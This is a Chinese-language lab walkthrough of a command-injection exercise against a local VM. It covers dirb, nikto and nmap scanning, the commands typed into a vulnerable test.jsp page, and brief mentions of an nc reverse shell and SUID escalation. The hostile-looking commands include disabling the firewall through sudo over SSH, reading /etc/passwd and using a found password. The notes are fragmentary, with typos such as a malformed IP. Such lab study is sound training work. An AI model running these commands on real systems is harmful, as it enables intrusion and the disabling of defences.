命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令,当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行漏洞
靶场渗透过程:
(35条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客
靶场导入vm
扫描IP获得靶机地址带vm标识
扫描可能的IP的端口判断是不是靶机
有多个vm 进行地址栏访问地址判断哪个是靶机地址 判断出120是靶机地址
根据端口扫描进行地址访问
扫描目录:
dirb http://192.168.3.120:22
dirb http://192.168.3.120:5355
dirb http://192.168.3.120:8080
访问:
http://192.168.3.120:8080/index.html
192.168.3.120:8080/manager
换工具进行扫描
nikto -host http://192.168.3.120:8080
1. 192.168.3.120:8080/manager/html
2. http://192.168.3.120:8080/test.jsp
根据页面提示输入
ls -l
ls -l /tmp
ls -alh /home
uname -a
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
kali设置监听端口
http://192.168.3.120:8080/manager/status
ps:
asp .net 运行在iis中间件
php 运行在 apache nginx
jsp 运行在java
dirb nikto 御剑 dirsearch扫描目录
nikto -h 1892.168.3.120:8080
发现目录:
1.manager.html:没有权限
2.text.jsp:
发现有页面 输入框
输入IP地址有没有反应
pwd可以执行
ls执行不了
whomi
ls -l /tmp出现信息文件
ls -alh /tmp 发现隐藏文件 没有重要信息
ls -alh / 发现很多文件 但不重要
ls -alh /home 发现用户bill 和文件bill
cat /home/bill 命令执行不了
more /home/bill 命令执行不了
tac /home/bill 命令执行不了
cat -alh /etc/passwd 命令执行不了
ls -alh /etc/passwd 命令执行
cd /home/ 命令执行不了
说明只能执行ls -l上面可以执行的
3.看目录 :8080/manager/status 显示要求登陆 看页面源代码发现一个用户名和密码 但登不进去
nmap -sV 192.168.3.120 -p 1-65535
发现有ssh 尝试用发现的用户和密码进行登陆 s3cret
使用漏洞扫描工具进行扫描
4.返回在8080:/text.jsp进行输入
ssh bill@localhost sudo -l
(35条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客
使用反弹shell连接
在登录框用nc方式生成反弹shell
反弹shell原理和常见反弹shell方式 - 知乎 (zhihu.com)
Linux下几种常见的反弹shell方式 - 简书 (jianshu.com)
(36条消息) 【学习笔记】bash -i命令_ps_x的博客-CSDN博客
kali开启防火墙 service ufw status
suid权限